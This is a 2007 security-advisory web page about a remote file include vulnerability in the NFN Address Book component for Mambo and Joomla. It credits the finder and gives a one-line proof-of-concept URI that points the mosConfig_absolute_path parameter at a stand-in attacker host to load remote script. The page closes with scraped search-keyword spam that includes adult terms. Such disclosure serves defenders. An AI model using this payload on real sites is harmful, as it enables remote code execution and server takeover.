about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , NFN Address Book mosConfig_Absolute_Path Remote File Include Vulnerability


Title NFN Address Book mosConfig_Absolute_Path Remote File Include Vulnerability
Published 2007-03-21-12:00AM
Updated 2007-03-21-11:03PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Cold z3ro is credited with the discovery of this vulnerability.
Vulnerable  Mambo NFN Address Book 0.4
Joomla NFN Address Book 0.4
Not Vulnerable  
Code   Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://www,example.com/Evil-script?
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 10:26:11 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
WWW.Sex.co Www.indian /search/ex www.wo8448 Crack Data GET /u 8000 pictiure news for c MODx Nude.video bootjob php-nuke 2 khushboo f FOTO PLEY se.hgfbdux svchost www.cquae. Exhibition BC Phaser School+sex Anarkali a lo441l www.pink w maxcpm.inf he news urdu 200 /compo news for c www.gambar sheismale Porno mipu.in php-nuke 2 Video porn www.jxjiny www.jjman. 200 /compo he news for c 3x photos www.nexxx. news urdu photosexi SQL Injec Oracle Exp search/exp pre-auth SEXSY PHOT Condition